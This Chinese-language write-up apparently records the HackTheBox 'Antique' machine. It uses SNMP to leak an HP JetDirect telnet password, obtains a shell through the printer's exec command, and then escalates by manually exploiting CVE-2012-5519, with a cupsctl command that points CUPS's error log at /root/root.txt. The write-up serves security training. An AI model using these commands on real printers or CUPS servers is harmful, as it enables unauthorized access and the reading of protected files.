文章目录

  • 概述
  • 声明
  • 题目概述
  • 信息收集
  • 漏洞信息获取
  • 初始立足点
  • 权限提升

概述

HackTheBox 是一个经典的在线靶机平台,提供了大量漏洞演练和CTF演练场景。

本次记录的是HTB Tracks 系列的 Intro to Printer Exploitation,即打印机相关漏洞的场景合集。随着攻防对抗的升级,打印机也成了的攻击目标之一。研究表明,打印机存在较多攻击面,使它们很容易遭受攻击。

声明

本文是对HackTheBox 专业靶场的演练记录,文中使用的工具和方法仅限学习交流使用,请不要将文中使用的工具和方法用于任何非法用途,请务必遵守《网络安全法》。

题目概述

本次靶机为Antique,题目地址https://app.hackthebox.com/machines/400

开启靶机后,靶机地址10.10.11.107

信息收集

使用nmap进行常规探测,发现开放23端口

nmap -Pn --open 10.10.11.107PORT   STATE SERVICE
23/tcp open  telnet

使用masscan全端口探测,发现只开放了23端口

sudo masscan -p1-65535 10.10.11.107 -e tun0 --rate=1000Discovered open port 23/tcp on 10.10.11.107

使用nmap进行详细探测,根据JetDirect关键字,判断为打印机相关

nmap -Pn -p 23 -sC -sV  10.10.11.107PORT   STATE SERVICE VERSION
23/tcp open  telnet?
| fingerprint-strings:
|   DNSStatusRequestTCP, LANDesk-RC, LDAPBindReq, NCP, NULL, TLSSessionReq:
|     JetDirect
|   DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, LDAPSearchReq, LPDString, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TerminalServer, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns, tn3270:
|     JetDirect
|_    Password:

使用nc连接,显示为HP JetDirect,试探性输入admin,提示Password,输入admin,提示Invalid password

nc -nv 10.10.11.107 23
(UNKNOWN) [10.10.11.107] 23 (telnet) openHP JetDirectadmin
Password: admin
Invalid password

漏洞信息获取

利用关键字HP JetDirect,搜索漏洞信息

其中一个漏洞提到了snmp,使用nmap扫描udp 161端口,看snmp是否开启

sudo nmap -sU -p 161 10.10.11.107PORT    STATE         SERVICE
161/udp open|filtered snmp

查看漏洞利用信息

使用snmpwalk获取对应mib库的信息

snmpwalk -v 2c -c public 10.10.11.107 .1.3.6.1.4.1.11.2.3.9.1.1.13.0
iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = BITS: 50 40 73 73 77 30 72 64 40 31 32 33 21 21 31 32
33 1 3 9 17 18 19 22 23 25 26 27 30 31 33 34 35 37 38 39 42 43 49 50 51 54 57 58 61 65 74 75 79 82 83 86 90 91 94 95 98 103 106 111 114 115 119 122 123 126 130 131 134 135

对获得的数据解码,得到密码为P@ssw0rd@123!!123

初始立足点

再次使用nc连接并输入密码,通过认证

通过?查询可用命令,发现可通过exec执行命令

使用经典语句反弹shell,在Kali中得到会话

当前为lp用户,查看其家目录的flag文件user.txt

权限提升

在bing搜索lpadmin,根据https://www.cups.org/doc/man-lpadmin.html,发现其有个http://localhost:631的页面

查看端口连接,发现631端口为本地监听

查询目标是否具有curl,发现已安装

使用curl访问http://127.0.0.1:631,发现CUPS版本1.6.1

在bing搜索CUPS 1.6.1的漏洞信息,对应的CVE编号为CVE-2012-5519

分析cups_root_file_read.rb的源代码,手工利用此漏洞,修改cups的配置文件,可通过cupsctl命令完成

cupsctl ErrorLog="/root/root.txt"

查看错误日志信息,得到root用户flag文件root.txt

curl http://127.0.0.1:631/admin/log/error_log

HTB-Antique相关推荐

  1. 手机流量共享 linux,linux – 通过HTB共享带宽和优先处理实时流量,哪种方案更好?...

    我想在我们的互联网线路上添加一些流量管理.在阅读了大量文档之后,我认为HFSC对我来说太复杂了(我不了解所有曲线的东西,我担心我永远不会把它弄好),CBQ不推荐,基本上HTB就是通往适合大多数人. 我 ...

  2. linux htb 源代码,LINUX TC:HTB相关源码

    LINUX TC:HTB相关源码 收藏 HTB(hierarchy token buffer)是linux tc(traffic control)模块中的排队队列的一种.它的配置比CBQ要简单.同时实 ...

  3. Linux 工具 | 第1篇:高级流控-TC+HTB+IFB+内核模块

    作者:isshe 日期:2018.09.19 邮箱:i.sshe@outlook.com github: https://github.com/isshe 高级流控-TC+HTB+IFB+内核模块 1 ...

  4. linux下TC+HTB流量控制

    C规则涉及到 队列(QUEUE) 分类器(CLASS) 过滤器(FILTER),filter划分的标志位可用U32或iptables的set-mark来实现 ) 一般是"控发"不控 ...

  5. HTB打靶(Active Directory 101 Mantis)

    namp扫描 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 03:40 EST Stats: 0:01:28 elapsed; 0 hos ...

  6. Linux TC 流量控制与排队规则 qdisc 树型结构详解(以HTB和RED为例)

    1. 背景 Linux 操作系统中的流量控制器 TC (Traffic Control) 用于Linux内核的流量控制,它规定建立处理数据包的队列,并定义队列中的数据包被发送的方式,从而实现对流量的控 ...

  7. 漏洞payload 靶机_【HTB系列】靶机Bitlab的渗透测试

    本文作者:是大方子(Ms08067实验室核心成员) ﹀ ﹀ ﹀ 0x00 本文目录 反思与总结 基本信息 渗透测试过程 补充 0x01 反思与总结 1. curl 发送GET参数化请求 2. 对反弹回 ...

  8. HTB打靶(Active Directory 101 Reel)

    nmap扫描目标 nmap -A -T4 10.10.10.77 Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-18 01:30 EST Nma ...

  9. HTB靶场系列 Windows靶机 Granny靶机

    勘探 还是使用nmap进行侦擦 先大致扫描 nmap 10.10.10.15 Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-01 10:29 C ...

  10. HTB Optimum[Hack The Box HTB靶场]writeup系列6

    这是HTB retire machine的第六台靶机 目录 0x00 靶机情况 0x01 信息搜集 端口扫描 检索应用 0x02 get webshell 0x03 提权 mfs中查找提权程序 执行s ...

最新文章

  1. 刷新三项世界纪录的跨镜追踪(ReID)技术是怎样实现的?进来了解一下
  2. sqlserver2008r2表复制原表_SQL Server 2008 R2 主从数据库同步
  3. 校园资源建设平台源代码
  4. Struts2环境下Tomcat启动异常:Exception starting filter struts2,报了一个java.lang.ClassNotFoundException
  5. 【吐血整理】面试官问的那些Java原理你都懂吗
  6. Django常用的模块
  7. java中的工厂模式_深入理解Java的三种工厂模式
  8. java中负数取整_Java取整,固定保留两位小数,适配负数、金融数字。
  9. H.264/AVC技术进展及其务实发展策略思考
  10. Android ActionBarSherlock使用教程
  11. python 遍历数组gbk编码_python bytes和bytearray、编码和解码
  12. 数字图像处理(五) 图像复原
  13. JPEG转换成TIFF
  14. vscode快速生成HTML模板
  15. 第十三届蓝桥杯大赛软件赛省赛真题
  16. cannot be cast to com.baomidou.mybatisplus.core.metadata.IPage
  17. Python数据分析培训班介绍
  18. Android 闹钟demo
  19. MOSFET的误启动发生机制-3
  20. Deepin 20 外接显示器配置

热门文章

  1. then在c语言中什么意思,通俗浅显的理解Promise中的then
  2. xlsx to vcf
  3. 【H5钢琴示例代码】
  4. Zynga达成收购手机游戏开发商StarLark的协议,后者是热门游戏《Golf Rival》的开发团队
  5. 周日报名截止,翼支付杯大数据建模大赛16万大奖邀你来!!
  6. ubuntu18.04安装搜狗输入法之后无法使用的问题
  7. 沈阳移动打造“爱贝通”、“校讯通”业务助少年儿童健康成长
  8. 曲卉:高阶增长黑客实战营
  9. 利用Matlab实现单像空间后方交会
  10. 关于前端架构的过去、现在与未来